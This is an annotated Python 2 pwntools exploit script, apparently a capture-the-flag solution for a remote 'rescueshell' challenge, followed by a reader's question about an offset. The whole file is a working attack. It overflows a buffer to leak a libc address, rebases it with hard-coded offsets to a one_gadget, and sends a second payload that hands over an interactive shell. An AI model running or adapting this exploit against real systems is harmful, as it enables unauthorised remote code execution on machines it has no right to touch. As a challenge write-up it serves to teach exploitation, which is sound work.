#!/usr/bin/python | |
import pwn | |
import struct | |
# Python 2 script (print statements, raw_input, str.encode("hex")); it does not
# run unchanged under Python 3.  Open the connection to the remote service; the
# commented-out line below is the local-process alternative.
p = pwn.remote("rescueshell.challs.malice.fr",6060)
# p = pwn.process("./rescue")
raw_input("ATTACH NOW")  # blocks until Enter, leaving time to attach a debugger
# First message: a run of filler bytes, then two little-endian 8-byte words.
# The constants are hard-coded, so they hold only for the specific build they
# were taken from (assumption: a non-PIE binary; the target is not on the page).
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601210 + 320) # PRINTF
payload += pwn.p64(0x40099a) # WRITE GADGET
p.recv()  # no timeout: blocks until the service sends something; reply discarded
p.sendline(payload)
# timeout=2: presumably returns whatever arrived within two seconds, which may be
# less than the whole reply or an empty string -- verify against pwntools recv().
data = p.recv(timeout=2)
# i think it eats zeros. lets grab 0x7f as the start.
print "DATA IS: " + data.encode("hex")  # .encode("hex") is a Python 2 str codec
# Keep the first 6 bytes and zero-extend to 8 (per the author's note above, the
# reply appears to have dropped the high zero bytes of the value).  If fewer
# than 6 bytes arrived, data is shorter than 8 here and unpack() below raises
# struct.error.
data = data[0:6] + "\x00\x00"
strncmp_leak = struct.unpack("<Q",data[0:8])  # 1-tuple; the value is element [0]
print hex(strncmp_leak[0])
# fread
# Rebase from the leaked value: subtract 0x6A460, add 0x41320.  Neither offset
# is documented here and both depend on one particular libc build; the variable
# name says strncmp while the comment above says fread -- which symbol the leak
# actually is cannot be told from this file (the gist comment asks the same).
one_gadget = strncmp_leak[0] - 0x6A460 + 0x41320
print "one_gadget leak at %x" % one_gadget
# Second message: same filler, then 0x601208 + 320 (8 less than the first
# message's 0x601210 + 320 -- presumably deliberate, cannot be confirmed here)
# and the computed address.
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601208 + 320) # PRINTF
payload += pwn.p64(one_gadget)
p.sendline(payload)
p.interactive()  # hand the terminal's stdin/stdout over to the connection
May I know which offset 0x41320 is?